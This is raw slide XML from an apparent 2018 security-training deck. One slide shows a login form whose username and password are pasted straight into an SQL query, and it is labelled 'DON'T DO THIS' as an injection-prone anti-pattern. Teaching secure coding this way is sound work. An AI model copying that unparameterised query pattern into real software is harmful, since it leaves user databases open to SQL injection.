            <a:xfrm>
              <a:off x="420584" y="1691723"/>
              <a:ext cx="1678720" cy="536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600">
                  <a:solidFill>
                    <a:srgbClr val="53585F"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Username</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="400" name="Password"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="420584" y="3257500"/>
              <a:ext cx="1605360" cy="536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600">
                  <a:solidFill>
                    <a:srgbClr val="53585F"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Password</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="401" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="409532" y="3865684"/>
              <a:ext cx="5793767" cy="618364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="E7EBEF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:hueOff val="384618"/>
                      <a:satOff val="3869"/>
                      <a:lumOff val="5802"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="403"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404"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405" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6346" y="6612198"/>
            <a:ext cx="24371308" cy="4814960"/>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408" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9295117" y="4574099"/>
            <a:ext cx="5793766" cy="618364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:satOff val="24555"/>
                <a:lumOff val="22232"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="12345"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9332144" y="4595943"/>
            <a:ext cx="1215046"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3000">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:satOff val="24555"/>
                    <a:lumOff val="22232"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>12345</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9295117" y="3007690"/>
            <a:ext cx="5793766" cy="618363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:hueOff val="384618"/>
                <a:satOff val="3869"/>
                <a:lumOff val="5802"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="rich"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9351519" y="3016834"/>
            <a:ext cx="854324"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3000">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:t>rich</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="SELECT *…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7358558" y="6979740"/>
            <a:ext cx="7069139" cy="4079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5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:t> users u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="5200">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>WHERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  u.username='</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="5200">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="18648"/>
                    <a:lumOff val="5971"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> u.password='</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:satOff val="24555"/>
                    <a:lumOff val="22232"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13726640" y="3611285"/>
            <a:ext cx="1" cy="5654306"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:hueOff val="384618"/>
                <a:satOff val="3869"/>
                <a:lumOff val="5802"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15756031" y="4853865"/>
            <a:ext cx="1" cy="5069459"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:satOff val="24555"/>
                <a:lumOff val="22232"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="rich"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13116793" y="9286958"/>
            <a:ext cx="1219697"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chemeClr val="accent4">
                    <a:hueOff val="384618"/>
                    <a:satOff val="3869"/>
                    <a:lumOff val="5802"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>rich</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="12345"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14506037" y="10074476"/>
            <a:ext cx="1991991"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chemeClr val="accent6">
                    <a:satOff val="24555"/>
                    <a:lumOff val="22232"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>12345</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417" name="SQL"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="70206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SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Seriously, never build a login page like this."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631137" y="12490960"/>
            <a:ext cx="5007993" cy="447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2000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Seriously, never build a login page like this.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419" name="DON’T DO THIS"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="358292"/>
            <a:ext cx="3717419" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C62818"/>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DON’T DO THIS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15063189" y="4883280"/>
            <a:ext cx="719428" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:satOff val="24555"/>
                <a:lumOff val="22232"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>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lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="411"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="7" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="8" presetClass="entr" nodeType="afterEffect" presetID="10" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="410"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="410"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="11" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="100"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="12" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="22" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="413"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="400"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="413"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="415"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="100"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="409"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetClass="entr" nodeType="afterEffect" presetID="10" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="408"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="100"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="408"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="420"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="420"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="29" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1100"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30" presetClass="entr" nodeType="afterEffect" presetSubtype="1" presetID="22" grpId="8" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="414"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(up)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="414"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="33" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="34" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="9" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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5" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="420" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="411" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="414" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="410" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="408" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="416" grpId="9"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="413" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="409" grpId="5"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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8"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64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650" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2651" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2652" name="Identify, Exploit: http://s3.amazonaws.com/digitaltrends-uploads-prod/2016/02/hacker-keyboard-dark-room.jpg…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683274" y="246490"/>
            <a:ext cx="23017453" cy="127487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numCol="2" spcCol="637815"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2029">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
